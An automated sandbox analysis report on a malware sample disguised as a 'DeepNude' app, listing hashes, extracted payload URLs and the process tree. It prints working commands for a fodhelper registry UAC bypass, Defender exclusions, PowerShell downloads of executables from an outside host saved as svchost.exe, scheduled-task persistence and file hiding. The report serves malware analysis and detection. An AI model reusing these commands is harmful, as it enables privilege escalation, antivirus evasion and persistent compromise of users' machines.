Analysis
-
max time kernel
30s -
max time network
16s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2022 11:44
Static task
static1
Behavioral task
behavioral1
Sample
DeepNude-4.1.8-main/DeepNude 4.1.8/Barcs/App.xml
Resource
win10v2004-20220812-en
Behavioral task
behavioral2
Sample
DeepNude-4.1.8-main/DeepNude 4.1.8/Barcs/Nugets/logs.vbs
Resource
win10v2004-20220901-en
General
-
Target
DeepNude-4.1.8-main/DeepNude 4.1.8/Banls.scr
-
Size
59KB
-
MD5
b242156243e162315223649f74781b47
-
SHA1
62a05a78cc3e413556427174797b266056228e14
-
SHA256
293dfd8fc8dbb5c9dae7f693dd7c8af5cc3b534080b75685738188ce4fa16a40
-
SHA512
a29d16c282c3362cc306ab5adb8031c17e69738aa9cf6c86c4d8503469d44376f76659860b8678383900b9a9aaeeac39ef249b1718e8891e4465ea9f8e8c198c
-
SSDEEP
384:J7dQrb1epzgNbvFAbBZUC6vZZBfNAAK/Voc+i0UzU1s4gQH7vn:hMbwiNL0ZUzlNAp/Vocb+
Malware Config
Extracted
http://asamy11.com/cp.exe
Extracted
http://asamy11.com/sv.exe
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPRomptBehAvioRAdmin = "0" reg.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 11 1464 powershell.exe 12 3684 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 1744 attrib.exe 4040 attrib.exe 4964 attrib.exe 1932 attrib.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2900 schtasks.exe 1920 schtasks.exe 1620 schtasks.exe 1268 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 5028 timeout.exe 3672 timeout.exe 4632 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 776 taskkill.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\ = "C:\\windows\\SYStem32\\cmd.exe /c REG ADD HKLM\\soFtwARE\\micRosoFt\\windows\\cuRREntveRsion\\policies\\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" reg.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\DelegAteExecute = " " reg.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd reg.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1472 powershell.exe 1472 powershell.exe 1860 powershell.exe 1860 powershell.exe 1464 powershell.exe 1464 powershell.exe 3684 powershell.exe 3684 powershell.exe 1256 powershell.exe 1256 powershell.exe 4112 powershell.exe 4112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 1256 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeDebugPrivilege 776 taskkill.exe -
Suspicious use of WriteProcessMemory 52 IoCs
Processes:
Banls.scrcmd.execmd.exefodhelper.execmd.exepowershell.exepowershell.exedescription pid process target process PID 4960 wrote to memory of 4084 4960 Banls.scr cmd.exe PID 4960 wrote to memory of 4084 4960 Banls.scr cmd.exe PID 4084 wrote to memory of 4136 4084 cmd.exe cmd.exe PID 4084 wrote to memory of 4136 4084 cmd.exe cmd.exe PID 4136 wrote to memory of 1304 4136 cmd.exe reg.exe PID 4136 wrote to memory of 1304 4136 cmd.exe reg.exe PID 4136 wrote to memory of 676 4136 cmd.exe reg.exe PID 4136 wrote to memory of 676 4136 cmd.exe reg.exe PID 4136 wrote to memory of 3524 4136 cmd.exe fodhelper.exe PID 4136 wrote to memory of 3524 4136 cmd.exe fodhelper.exe PID 3524 wrote to memory of 1352 3524 fodhelper.exe cmd.exe PID 3524 wrote to memory of 1352 3524 fodhelper.exe cmd.exe PID 4136 wrote to memory of 5096 4136 cmd.exe cacls.exe PID 4136 wrote to memory of 5096 4136 cmd.exe cacls.exe PID 1352 wrote to memory of 5012 1352 cmd.exe reg.exe PID 1352 wrote to memory of 5012 1352 cmd.exe reg.exe PID 4136 wrote to memory of 1472 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 1472 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 1860 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 1860 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 5028 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 5028 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 1464 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 1464 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 3672 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 3672 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 3684 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 3684 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 4632 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 4632 4136 cmd.exe timeout.exe PID 4136 wrote to memory of 1256 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 1256 4136 cmd.exe powershell.exe PID 1256 wrote to memory of 2900 1256 powershell.exe schtasks.exe PID 1256 wrote to memory of 2900 1256 powershell.exe schtasks.exe PID 4136 wrote to memory of 4112 4136 cmd.exe powershell.exe PID 4136 wrote to memory of 4112 4136 cmd.exe powershell.exe PID 4112 wrote to memory of 1920 4112 powershell.exe schtasks.exe PID 4112 wrote to memory of 1920 4112 powershell.exe schtasks.exe PID 4136 wrote to memory of 1620 4136 cmd.exe schtasks.exe PID 4136 wrote to memory of 1620 4136 cmd.exe schtasks.exe PID 4136 wrote to memory of 1268 4136 cmd.exe schtasks.exe PID 4136 wrote to memory of 1268 4136 cmd.exe schtasks.exe PID 4136 wrote to memory of 1744 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 1744 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 4040 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 4040 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 4964 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 4964 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 1932 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 1932 4136 cmd.exe attrib.exe PID 4136 wrote to memory of 776 4136 cmd.exe taskkill.exe PID 4136 wrote to memory of 776 4136 cmd.exe taskkill.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 1744 attrib.exe 4040 attrib.exe 4964 attrib.exe 1932 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Banls.scr"C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Banls.scr" /S1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8/Barcs/Nugets/logs.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Barcs\Nugets\logs.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F4⤵
- Modifies registry class
-
C:\Windows\system32\reg.exeREG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F4⤵
- Modifies registry class
-
C:\Windows\system32\fodhelper.exeFodhelpeR.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\windows\SYStem32\cmd.exe"C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F6⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SYStem32\cacls.exe"C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".dll""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /T 14⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamy11.com/cp.exe','C:\Users\Admin\file\svchost.exe')4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /T 14⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamy11.com/sv.exe','C:\Users\Admin\file\f\svchost.exe')4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /T 14⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn SystemRestore', '/IT', '/TR', \"C:\Users\Admin\file\svchost.exe\""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn SystemRestore /IT /TR C:\Users\Admin\file\svchost.exe5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn SystemRegenerate', '/IT', '/TR', \"C:\Users\Admin\file\f\svchost.exe\""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn SystemRegenerate /IT /TR C:\Users\Admin\file\f\svchost.exe5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 3 /tn "SystemBackup" /tr "C:\Users\Admin\file\f\svchost.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 2 /tn "SystemRecovery" /tr "C:\Users\Admin\file\svchost.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\file4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\file\svchost.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\file\f4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\file\f\svchost.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD57a451cd1316d70a65910773fee8c3a43
SHA1d2db32d5037153dd1d94565b51b5b385817a3c3d
SHA256862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c
SHA51260887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53bc487c4f8b717d6f9744ecffaeba1af
SHA19a0a6198ae1e2782f109bcb1cb9e86003b6fcfdb
SHA2561ec5b30fddeee139923b4296b5f7ca549775e5679dac48204a77f4ac5391c0cc
SHA512552b82ebb19ff6c7f3214b33d31c2f295702a91c699fdd835acc7ce3a4e5bc10bbacde8cf77422d494ea6193d46d78786d3cdd26077d0ab1a98426fd83652dfe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD593f47be3923281bcca20fdc835a85f4a
SHA14f542170c3cf56e32f5d7473a59e277a8cbbe305
SHA256a2a177f1e168171ed86deac452448ca26768c3f3af9dd5d4a1ec4e7d2e7471a0
SHA512598f9e0d0c4998b08d652ef94d93b6ac8c4181ccce0faac134287b40bb9ca3dd44264ef4f14e13cd2cc23ef3f205eab3140d40bdbf487157d5a02bdd7fe043b9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5305a12bb9c823693a21be8eb4cd6764f
SHA1dcafb24f3356122d647069577755597d7ecddeca
SHA256b54ce1e64d4bd29a0c1634dec91251428a81f61f52121e73b42fbd8873411718
SHA512939dea2c3f42b1e09465d26b5e008bd32fd95f4bd15c89ae22369a7cc6c7cfd729e030627d19c4d469280c3aa7024edf57d3b78e08dc4d43d799fb891a92e196
-
C:\Users\Admin\file\f\svchost.exeFilesize
9KB
MD51d7c371b11e5106c1c74927dc3f7af32
SHA1a45fdd112ff13933926f0249e04e877819f83bed
SHA25636e1a3ffea6eb3d08e7d37a7bfc30276f51b315e259dfcc23661572df33141dc
SHA512707d0eecfefdb6962d30651b1b8595bf56530b7f80aaf54cc4dff727e2dfbc6a19781b492e3b15db9699d5586be38323132535900cfe6ced4c089707f5465c60
-
C:\Users\Admin\file\svchost.exeFilesize
3.8MB
MD545c8f90c877f80ba045b3dbe894e618c
SHA1daab90a71238516c0f2b7f0bc304081d5a688b26
SHA25644aa53ef588c973163b1d312e2920825b5287640f1f9b1447a784f1e2802e6ee
SHA512daae8bd7bcfeb329f056d76ced7d1cf974194ac757e375f3f5f5982b431828c0e652d3e49700ad876173279a658632e396c9c1d4588c38328bbe2676ae2bdd68
-
memory/676-137-0x0000000000000000-mapping.dmp
-
memory/776-179-0x0000000000000000-mapping.dmp
-
memory/1256-160-0x0000000000000000-mapping.dmp
-
memory/1256-162-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1256-164-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1268-172-0x0000000000000000-mapping.dmp
-
memory/1304-136-0x0000000000000000-mapping.dmp
-
memory/1352-139-0x0000000000000000-mapping.dmp
-
memory/1464-153-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1464-152-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1464-150-0x0000000000000000-mapping.dmp
-
memory/1472-144-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1472-143-0x00000224F0120000-0x00000224F0142000-memory.dmpFilesize
136KB
-
memory/1472-142-0x0000000000000000-mapping.dmp
-
memory/1620-171-0x0000000000000000-mapping.dmp
-
memory/1744-173-0x0000000000000000-mapping.dmp
-
memory/1860-145-0x0000000000000000-mapping.dmp
-
memory/1860-148-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/1920-168-0x0000000000000000-mapping.dmp
-
memory/1932-177-0x0000000000000000-mapping.dmp
-
memory/2900-163-0x0000000000000000-mapping.dmp
-
memory/3524-138-0x0000000000000000-mapping.dmp
-
memory/3672-154-0x0000000000000000-mapping.dmp
-
memory/3684-155-0x0000000000000000-mapping.dmp
-
memory/3684-158-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/3684-157-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4040-174-0x0000000000000000-mapping.dmp
-
memory/4084-134-0x0000000000000000-mapping.dmp
-
memory/4112-165-0x0000000000000000-mapping.dmp
-
memory/4112-169-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4112-170-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4136-135-0x0000000000000000-mapping.dmp
-
memory/4632-159-0x0000000000000000-mapping.dmp
-
memory/4960-167-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4960-132-0x0000000000A10000-0x0000000000A24000-memory.dmpFilesize
80KB
-
memory/4960-133-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4960-180-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmpFilesize
10.8MB
-
memory/4964-176-0x0000000000000000-mapping.dmp
-
memory/5012-141-0x0000000000000000-mapping.dmp
-
memory/5028-149-0x0000000000000000-mapping.dmp
-
memory/5096-140-0x0000000000000000-mapping.dmp